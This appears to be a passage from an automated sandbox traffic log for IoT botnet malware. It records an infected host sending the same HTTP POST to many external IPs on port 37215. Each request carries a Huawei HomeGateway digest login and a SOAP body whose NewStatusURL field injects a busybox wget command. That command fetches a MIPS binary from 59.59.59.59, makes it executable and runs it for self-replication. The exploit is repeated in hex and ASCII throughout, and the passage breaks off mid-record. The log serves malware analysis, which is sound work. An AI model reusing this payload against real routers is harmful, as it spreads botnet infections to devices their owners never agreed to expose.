2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1550192.168.2.153454031.115.37.13437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.903126001 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1551192.168.2.1556828157.73.91.1337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.903156996 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1552192.168.2.1536378112.180.170.18837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.903290033 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1553192.168.2.156012665.48.69.8637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.903337955 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1554192.168.2.1551264157.2.114.3337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.903404951 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1555192.168.2.155491854.128.109.937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.903451920 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1556192.168.2.1557320180.14.159.10437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.903510094 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1557192.168.2.155899024.143.235.1537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.903537035 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1558192.168.2.155944641.98.34.9137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.908394098 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1559192.168.2.1543918197.172.122.21837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.908417940 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1560192.168.2.1538072197.237.243.13837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.908449888 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
